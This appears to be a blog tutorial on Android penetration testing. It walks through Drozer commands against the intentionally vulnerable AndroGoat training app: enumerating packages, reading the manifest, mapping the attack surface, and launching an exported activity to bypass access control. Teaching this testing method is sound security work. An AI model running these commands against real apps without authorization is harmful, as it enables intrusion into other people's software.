BOOK THIS SPACE FOR AD
ARTICLE ADHello Guys………..
Ayush Kumar here, a passionate VAPT analyst with a interest in cybersecurity. Today, I’m excited to share insights and experiences from my journey in vulnerability assessment and penetration testing. In this article, I will guide you through the process of using the Drozer tool for Android penetration testing. If you’re eager to advance your expertise in the field of cybersecurity, you’ve come to the right place!
Introduction
In this guide, I will demonstrate how to use Drozer for Android penetration testing. From practical exploit scenarios, you’ll gain a solid understanding of how to use Drozer to enhance your app security testing toolkit. Let’s dive into the world of Android penetration testing with Drozer!
Prerequisites
If you have not yet installed Drozer, I recommend referring to my previous blog, where I provided a detailed step-by-step guide on setting up Drozer:- DROZER SETUP
Exploitation with Drozer: Getting Started
In this demonstration, I will showcase Drozer’s capabilities using vulnerable applications such as the AndroGoat app.
Install the Vulnerable Applications:
adb install Androgoat.apkRetrieve the Package Names of All Applications on the Android Device:
run app.package.listRetrieve the Package Name of the Specific Vulnerable Application:
run app.package.list -f androgoatRetrieve Basic Information of the Specific Package:
run app.package.info -a owasp.sat.agoatRead the Android Manifest of the Application:
run app.package.manifest owasp.sat.agoatIdentify the Attack Surface of the Application:
run app.package.attacksurface owasp.sat.agoatRetrieve the Exported Activity Components of the Application:
run app.activity.info -a owasp.sat.agoatExploit the Android Activities:We will now attempt to exploit the Android activities.
run app.activity.start --component owasp.sat.agoat owasp.sat.agoat.AccessControl1ViewActivityThank you for taking the time to read this guide. I hope you find Drozer to be a valuable tool in your Android security testing endeavors.
Happy Hacking!
Linkedin:- https://www.linkedin.com/in/ayush92/